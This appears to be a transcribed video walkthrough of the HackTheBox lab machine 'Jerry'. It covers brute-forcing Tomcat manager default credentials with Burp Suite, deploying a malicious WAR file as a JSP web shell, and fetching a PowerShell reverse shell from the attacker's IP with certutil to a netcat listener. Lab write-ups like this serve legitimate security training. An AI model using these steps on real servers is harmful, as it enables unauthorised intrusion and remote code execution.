Hello hackers, welcome back. Today we'll be looking at another machine from HackTheBox. One of the easier ones if you're familiar with Burp Suite, otherwise it could be quite tough, so hang in there and do follow along. First of all, begin with an Nmap scan. Oh, and do excuse the noise in the background, some construction work going on. Anyhow, Nmap scan following the usual formats. A flag for aggressive, meaning service scan, OS detection and a script scan. -N to avoid DNS resolution. -PN to avoid pinging the box, because Windows boxes shouldn't usually respond to pings. -P- all ports. VV for verbose, and what you get is the following output. So it's not much going on here. Only one open port, Apache Tomcat on 8080. So let's open up Firefox and take a look. Right, here we are. Let's check the manager app, and we can see it's asking us to sign in. It's basic auth. So what we could do is we could capture the request in Burp. So let's open up Burp Suite. Yes, okay. Next, start Burp. And if you don't know what I just did there with Foxy Proxy, there are guides online, or I may go over that in a later video. Anyhow, let's send a request. Test. Go back to Burp. Proxy. HTTP history. Oops. Let's turn the intercept on first. Actually, no, we don't. There should be some history. Let's try that again. And that's very weird. Let's turn Burp on. Seems like I need to try that again. Hold on. Ah, there we are. Now there's some history. Test, sign in. Back to history. This is what we get. Let's take a look at this. I think this is base 64. Yep, there we are. Let's hack this. I'm choosing a payload. Not sure what the default credentials are. Let's take a look. Apache Tomcat default creds. Here we are. So there's a bunch. Let's get the raw. Control A, Control C. Let's go back to our terminal. Open up Vim. pdc.txt, paste that there. Go to the very top, delete this, delete this, delete this, delete that. Close and save. Now this isn't in a format that we can use, so what we should do here is use the following command. So awk and sed will edit this text file to produce output which is more workable, especially with Burp Suite. Let's take a look. There we are. Let's just remove that there at the bottom. Perfect. Let's go back to Burp Suite. load the payload, aptc new.txt, uncheck this, payload processing. Well, since the request is sent in base 64, we have to encode the payload. So let's do that and start attack. Okay. So usually what you would do is sort by length or status code. And immediately this stands out, HTTP 200 and a huge length. Send this to the decoder. Let's take a look at what the credentials are. Decoder's base 64. There we go, Tomcat secret. Right. Let's go back here. Tomcat secret. And now we are in Tomcat Web App Manager. Where do we go from here? Well, pen testing Apache Tomcat. Let's see what Google tells us. Hack tricks. Now I've already done this, so I'll just skip straight to what works. Here we are, manual method 2. So basically, I think, right, you have to make a .war file, upload it, and then it gives you a web shell. And you can do all of that in literally 30 seconds. Let's go. Oops. Done that. Next we make the WAR file. Then we go back to manager, browse, Kali, HackTheBox, Jerry, backup.war, deploy. It's here, and the exploit specifies we have to navigate to cmd.jsp. And there's our web shell. Perfect. First thing I always do is who am I? And well, we're already system, so all we need now is a reverse shell. Or you could be lazy and just locate the flags and count them out, or type them out rather. Let's do the reverse shell. Let's do PowerShell. Inputs are our IP, select a port, it does the hard work, copy it over, make a new file, a PS1 file, rev.ps1, insert that, close, start a web server to serve the file. Let's open up a netcat listener to receive our shell, and then let's go back to the web shell. And I believe if it's a Windows CMD terminal, we use certutil split f url cache http ://10.10.4139 rev.ps1. Do a quick, seems that doesn't work. Let's see if rev.ps1 gives us our reverse shell. Of course, PowerShell.exe has to be called first. And then, there we are. If we navigate to administrator's desktop, flags, there's our flag. So all you'd have to do is type it out, and there's our box fully owned. GG.